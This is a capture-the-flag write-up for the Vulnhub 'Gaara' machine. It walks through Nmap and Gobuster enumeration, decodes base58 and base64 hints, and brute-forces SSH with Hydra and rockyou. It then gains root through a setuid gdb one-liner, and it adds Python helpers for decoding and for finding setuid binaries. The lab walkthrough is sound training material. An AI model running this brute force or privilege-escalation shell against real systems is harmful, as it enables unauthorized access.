Gaara 1: BOOT2ROOT CTF VULNHUB WRITEUP

Hello everyone! Welcome to my second Capture-the-Flag writeup. My first one was on PWN THE TRON, a great machine for practicing. If you’re interested, you can check it out here. Now, let’s dive into a new challenge, Gaara from Vulnhub. Based on what I’ve gathered, this is an easy machine to tackle. Let’s get started!

1. Reconnaissance

Let’s determine the IP of our target first:

The target's IP is 192.168.43.140.

Now that we know, let’s use Nmap to scan the target’s network and identify any open ports that could serve as potential entry points.

nmap -A -sV -p- -T4 -v 192.168.43.140

As you can see, only two ports are open: 22 (SSH) and 80 (HTTP). Note that -A already enables version detection, so the extra -sV is redundant but harmless.

2. Enumeration

Let’s take a quick look at the interface of our target

Not a fan of Naruto xD

Next, enumerate the web root for hidden directories and files that may hold credentials, misconfigurations or other footholds we can use to get deeper into the system. We'll use Gobuster with the dirbuster medium wordlist and the html, php and txt extensions:

gobuster dir -u http://192.168.43.140/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -t 64

Of the results, one directory, /Cryoserver, caught my attention. At first it looked like it had nothing of value, but the page scrolls, and at the very bottom three more subdirectories are hidden:

Temari, Kazekage, and iamGaara

I dug through all of them, and it's just some wiki-style storyline crap. What's interesting is that the storyline is the same across all three directories, so anything that differs between them is worth a close look. After carefully reading the storyline in iamGaara, I found this string:

Some sort of encoding

The string looked encoded, so I launched my own decoder tool, Kudo, which tries the base-family encodings in turn (if you're curious, you can check out the tool here). Working through the base encodings, the string turned out to be base58. A useful tell: base58 drops 0, O, I and l from its alphabet and uses no padding, so a string of mixed-case alphanumerics with none of those four characters and no trailing = is a good candidate.
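To make the decoding step reproducible without the author's Kudo tool, here is an added example (mine, not from the write-up and not Kudo's code): a minimal base58 encoder and decoder using the Bitcoin alphabet, plus a helper that tries base64 and then base58 and reports which one yields printable text. The encoded sample is constructed inside the block by re-encoding the plaintext the write-up recovers; the original string from the iamGaara page is not reproduced here.

```python
import base64
import binascii

# Added example, not the author's Kudo tool. Bitcoin base58 alphabet:
# digits and letters with 0, O, I and l removed to avoid confusion.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {c: i for i, c in enumerate(ALPHABET)}


def b58encode(data: bytes) -> str:
    """Encode bytes as base58; each leading 0x00 byte becomes a leading '1'."""
    n = int.from_bytes(data, "big")
    digits = []
    while n:
        n, rem = divmod(n, 58)
        digits.append(ALPHABET[rem])
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + "".join(reversed(digits))


def b58decode(text: str) -> bytes:
    """Decode base58 text; raises ValueError on characters outside the alphabet."""
    n = 0
    for ch in text:
        if ch not in INDEX:
            raise ValueError(f"not a base58 character: {ch!r}")
        n = n * 58 + INDEX[ch]
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_ones = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_ones + body


def _printable(data: bytes) -> bool:
    """Non-empty and every byte is printable ASCII."""
    return bool(data) and all(0x20 <= b < 0x7F for b in data)


def guess_encoding(text: str):
    """Try base64, then base58; return (scheme, plaintext) for the first one
    whose output is printable ASCII, or None if neither decodes cleanly."""
    try:
        data = base64.b64decode(text, validate=True)
        if _printable(data):
            return "base64", data.decode("ascii")
    except (binascii.Error, ValueError):
        pass
    try:
        data = b58decode(text)
        if _printable(data):
            return "base58", data.decode("ascii")
    except ValueError:
        pass
    return None


def decode_credential(encoded: str) -> tuple:
    """Decode a base58 blob and split it as user:password, the shape found on the box."""
    user, _, password = b58decode(encoded).decode("ascii").partition(":")
    return user, password


if __name__ == "__main__":
    # Constructed sample: the plaintext the write-up recovers, re-encoded here.
    sample = b58encode(b"gaara:ismyname")
    print(sample, "->", guess_encoding(sample), decode_credential(sample))
```

The base64 attempt uses validate=True so that stray characters fail fast instead of being silently skipped; a base58 string whose length happens to be a multiple of four can still pass base64 validation, which is why the printable check, not the decoder, decides which scheme wins.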

3. Exploitation

The plaintext reveals gaara:ismyname, a clear hint that gaara is a user on the box. Since SSH is open (remember the Nmap scan), we can brute-force that account with Hydra and the rockyou wordlist. One caveat: -t 64 is far more parallelism than most sshd instances accept (OpenSSH's MaxStartups default is 10:30:100), and Hydra itself warns and recommends -t 4 for SSH. If you see connection errors or a miss on a password you know is in the list, lower the task count.

hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.43.140 ssh -t 64 -VVV

The password for user gaara is iloveyou2

Now that we have the login credential, it’s time for us to login through SSH as user gaara.

ssh gaara@192.168.43.140

User Flag!

We’re in!!! And got the user Flag!!

As you may have noticed, there's another file in the home directory, Kazekage.txt. This is its content:

Probably base64, right? I decoded it on the target machine:

echo "base64-encoded-string" | base64 -d

The plaintext points to a games directory. I navigated to it and found a .txt file there. Here's its content:

The file contains a Brainfuck program rather than an encoded string; running it prints the hidden message. We can do that with the online interpreter here.

The result is: You think you could find something that easily? Try harder!

4. Privilege Escalation

I guess we need to dig deeper, so I searched the entire filesystem for regular files with the setuid bit set. Such binaries run with the privileges of their owner (often root) no matter who executes them, which makes them the first place to look for an escalation.

find / -type f -perm -04000 2>/dev/null

As you can see, these are the setuid binaries on the box, and gdb is among them. A setuid-root gdb is enough for a root shell; GTFOBins lists the exact invocation for the SUID case:

gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

Because gdb runs with an effective UID of 0, so does its embedded Python interpreter, and execl replaces the gdb process with /bin/sh. The -p flag matters: without it, sh would notice that the real and effective UIDs differ and drop back to gaara's privileges; with it, the shell keeps the effective UID of root. Run id right after to confirm before going for the flag.
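As an added example (mine, not from the write-up), here is a Python equivalent of the find command above that also reports each binary's owner and flags names with documented setuid escalation paths, so the gdb hit would stand out immediately. The set of flagged names is a small sample of entries from GTFOBins and is an assumption to be refreshed against the live site, not a complete list.

```python
import os
import pwd
import stat

# Added example, not from the write-up. Sample of binaries whose SUID entry
# on GTFOBins gives a shell; assumption to be checked against the current list.
KNOWN_ESCALATORS = {"gdb", "find", "vim", "python", "python3", "bash",
                    "env", "nmap", "perl"}

# Pseudo-filesystems that cannot contain real binaries; skip them for speed.
SKIP_DIRS = {"/proc", "/sys", "/dev"}


def is_setuid(mode: int) -> bool:
    """True for a regular file whose setuid bit is set (find -type f -perm -04000)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def owner_name(uid: int) -> str:
    """Resolve a UID to a name, falling back to the number for unknown UIDs."""
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)


def find_setuid(root: str = "/") -> list:
    """Walk root without following symlinks and collect setuid regular files."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink's own mode, never its target's
            except OSError:
                continue             # unreadable entry, same as 2>/dev/null
            if is_setuid(st.st_mode):
                hits.append({
                    "path": path,
                    "owner": owner_name(st.st_uid),
                    "root_owned": st.st_uid == 0,
                    "known_escalator": name in KNOWN_ESCALATORS,
                })
    return hits


def interesting(hits: list) -> list:
    """Paths that are root-owned and have a documented setuid escalation."""
    return [h["path"] for h in hits if h["root_owned"] and h["known_escalator"]]


if __name__ == "__main__":
    results = find_setuid("/")
    for h in results:
        flag = "  <-- check GTFOBins" if h["path"] in interesting(results) else ""
        print(f"{h['owner']:<10} {h['path']}{flag}")
```

Ownership is reported because a setuid bit only buys you the owner's privileges: a setuid binary owned by an unprivileged service account is a lateral step, not a root shell, and the flagging logic only marks the root-owned ones.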

It works!!!! We have the root user!!

This is the Final Flag:

We’ve successfully completed Gaara!!

Conclusion

Gaara is an easy machine to tackle, but it still requires players to analyze carefully. While it may seem straightforward, it challenges users to think critically and explore different techniques, such as encoding, file analysis, and privilege escalation. The machine reinforces the importance of attention to detail and persistence in uncovering hidden vulnerabilities, making it a great learning experience for those looking to sharpen their hacking skills.
